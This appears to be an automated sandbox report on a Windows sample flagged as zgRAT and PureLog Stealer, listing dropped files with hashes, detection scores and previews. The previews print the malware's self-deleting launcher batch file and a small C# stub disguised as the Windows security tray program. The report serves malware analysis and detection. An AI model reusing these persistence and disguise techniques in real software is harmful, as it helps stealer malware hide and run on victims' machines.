                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):59
                                                  Entropy (8bit):4.9034152949412055
                                                  Encrypted:false
                                                  SSDEEP:3:altDUrnkB2dGn:atIrkB6Gn
                                                  MD5:97A57B12DA8A3AA5C6C73F131CDE11DC
                                                  SHA1:72F9A13F92CDFBCB5C1D3F68481F8E9439A079F7
                                                  SHA-256:8506EB4015E0FD5779D0B6934C1BA7FA203783EC7615B954CCEBCDA4F064DFAE
                                                  SHA-512:992A45EBCEC40F517C093029F1A6DBE8A9728AC7B27E22D4EFC5E9E6AFDFDAF2ED2B59905245087299ADE8945518B9F8397FEA77C56C7165D144B5ABC7C15202
                                                  Malicious:false
                                                  Preview:eZj0pH1P4Ij6TgfoVXUM1AeMLfq22ZoyFSsDA1KTeYKF0H2YExjKyALe4Wp
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (951), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):951
                                                  Entropy (8bit):5.891785453819785
                                                  Encrypted:false
                                                  SSDEEP:24:GG5T/Jx2rbYdNySbMEmTip77mUEqyJDxkU9LfOU:GGxncYdOK7CUNk
                                                  MD5:D8C5419F9FE2598A5A5761B19370F241
                                                  SHA1:F249BE416BF2082F8D898E128B16FD4187DD8DC8
                                                  SHA-256:871CE8D3E0FC2F98805A120EB38D58081BB73AA4322298EF40C8B88BB0B88BD4
                                                  SHA-512:55BE5E0D570F1057215617A35BB181A1DA0A8CDD88720E4E1AA238AE5B53700019DD9AD3DC21D7E0B22E78F5BBA986C608C3157019321719919BDFF6FB83E60A
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                  Process:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1306
                                                  Entropy (8bit):5.353303787007226
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                  MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                  SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                  SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                  SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                  Malicious:false
                                                  Preview:@...e.................................X..............@..........
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Aug 1 07:17:15 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1956
                                                  Entropy (8bit):4.54853216427565
                                                  Encrypted:false
                                                  SSDEEP:24:HZO9/O5tDfHEwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:j5xrKhmMluOulajfqXSfbNtmh1Z
                                                  MD5:B68074233CA8CC2D4564D113DED2E905
                                                  SHA1:45DAE4A50BE073EE39A899DBE6D68FC9AF3B2F92
                                                  SHA-256:95EE7C9B8552BCFFCF79B32FC3851E8DAFB65C4EF7A274799638ECCE70C45D75
                                                  SHA-512:8D03BA879E8D1161494CDC6F7AA656DFA3E3B3FD0F7EA61815CE6B6E31817BC2A91F0F66EB4EB9E00B0A0B1C30065670CAE21616030156FBBFF05A84A06B939A
                                                  Malicious:false
                                                  Preview:L...{6.f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES4F01.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.403856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:OJ8e:OGe
                                                  MD5:36746C915B9709EA314C9551BB9357A5
                                                  SHA1:16442803F613F91C31E4C2D752B91F4703525A64
                                                  SHA-256:1311C475A5697ACC94F5E6F741580C5404F4A69C372D700DF99D26E9BAB27D08
                                                  SHA-512:3EA57116204C23944AD551E3E11F8A1F900C1D966FD5B42BCC15A990557457DFB3E18C542FBD654A61A94B540F61723AB4F0AE5B97FDD34BC2774CB5C367D2D0
                                                  Malicious:false
                                                  Preview:ndMBsczZWEmRyFze9EGNIoMA2
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):199
                                                  Entropy (8bit):5.0733514334481935
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE7EXsKOZG1wkn23fIVhn:HTg9uYDE7EXWfQDn
                                                  MD5:7EF01AA019ACEA7DFC73F2373A5D73AF
                                                  SHA1:9E1DD96689AFEEEE13B0205DC2C974875D554989
                                                  SHA-256:24CFCC612013B809D985512EDB923FAA515DE5D4752D7EC16EA7459D2D5622C7
                                                  SHA-512:E132B0DE97CE35521F3F3D205ADAB21C5F4928035872DAC8D39CBE0ABF74C1FE6959B6057CCCA1E531A5FC7AFB2400A3D13C334FA5504FB95E301EAB1E22E1BB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\dllhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fCpmFQ1klK.bat"
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):370
                                                  Entropy (8bit):4.871284232272529
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JEXriFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKa
                                                  MD5:EF5726A6103652B2DDDC7CDD44B195E6
                                                  SHA1:D26176BAE31D5E297923D7A007A0D5BF6A3455C2
                                                  SHA-256:BAAFACA64C25F6C6D88063B4E9C01BB4298414B1DDEFD68AE8AB394C4AB3304A
                                                  SHA-512:FC0653A92211761AFA6F5F060FC101499291174185B966833EC4197194B92A865787E5E1E12D0218A9A20A43DF58CE3E88A69E85A25749B693BB5AEA28D58324
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\dllhost.exe"); } catch { } }).Start();. }.}.
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):5.1264845457009205
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fNVn9n:Hu7L//TRq79cQWfFVn9
                                                  MD5:83AF4C45DA447EA79ED47ABF7514250E
                                                  SHA1:810D2E8B68FDFB51F791F3C1BBD6EF58ADB010FB
                                                  SHA-256:A93B817D4D6B1D86D4D0AFDE03313C540B25C4F736FA5ADCA46787D7EFB8010E
                                                  SHA-512:E0B0F01499CFFAB9402837A4B2A278D1D7AFA5280358D75863314C16B6BE18F5EE1ECCFE68D120A3D605EA27B33A4A8449A1DCC92709B63FCE4FC3CFCAFF608C
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.0.cs"
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):750
                                                  Entropy (8bit):5.270707350569988
                                                  Encrypted:false
                                                  SSDEEP:12:KJN/I/u7L//TRq79cQWfFVn4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfFCKax5DqBVKVrdFAw
                                                  MD5:99FA4910CB0FD28D64D371812771D53C
                                                  SHA1:1211E8E18AC30EFF2A83E44F153212FF85E5C470
                                                  SHA-256:908DDBA1324FB0804EDE1249D4E51939B0117D26F0B2EB8DB3A1A8F00576BEBC
                                                  SHA-512:B73AC2DF779E0D2CE46CEFB9192FFA6A958B786EF141C437D15CC85194D9DF06781B50F09279C5E46FF03C6E37C2DB911DFFF443275F4327C72309DE914551AE
                                                  Malicious:false
                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: h6t9F6kG2d.exe, Detection: malicious, Browse
                                                  • Filename: 4e9460942b0ebe09cd130b4154587ec6f5f14bbad4b23.exe, Detection: malicious, Browse
                                                  • Filename: LisectAVT_2403002A_263.exe, Detection: malicious, Browse
                                                  • Filename: U0KN4fzlG7.exe, Detection: malicious, Browse
                                                  • Filename: pGQ1F8RaiV.exe, Detection: malicious, Browse
                                                  • Filename: yM80f3LuOQ.exe, Detection: malicious, Browse
                                                  • Filename: l0OB73W8ax.exe, Detection: malicious, Browse
                                                  • Filename: 475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe, Detection: malicious, Browse
                                                  • Filename: AK4VPeDc0M.exe, Detection: malicious, Browse
                                                  • Filename: a6zbacl43h.exe, Detection: malicious, Browse
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 22%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
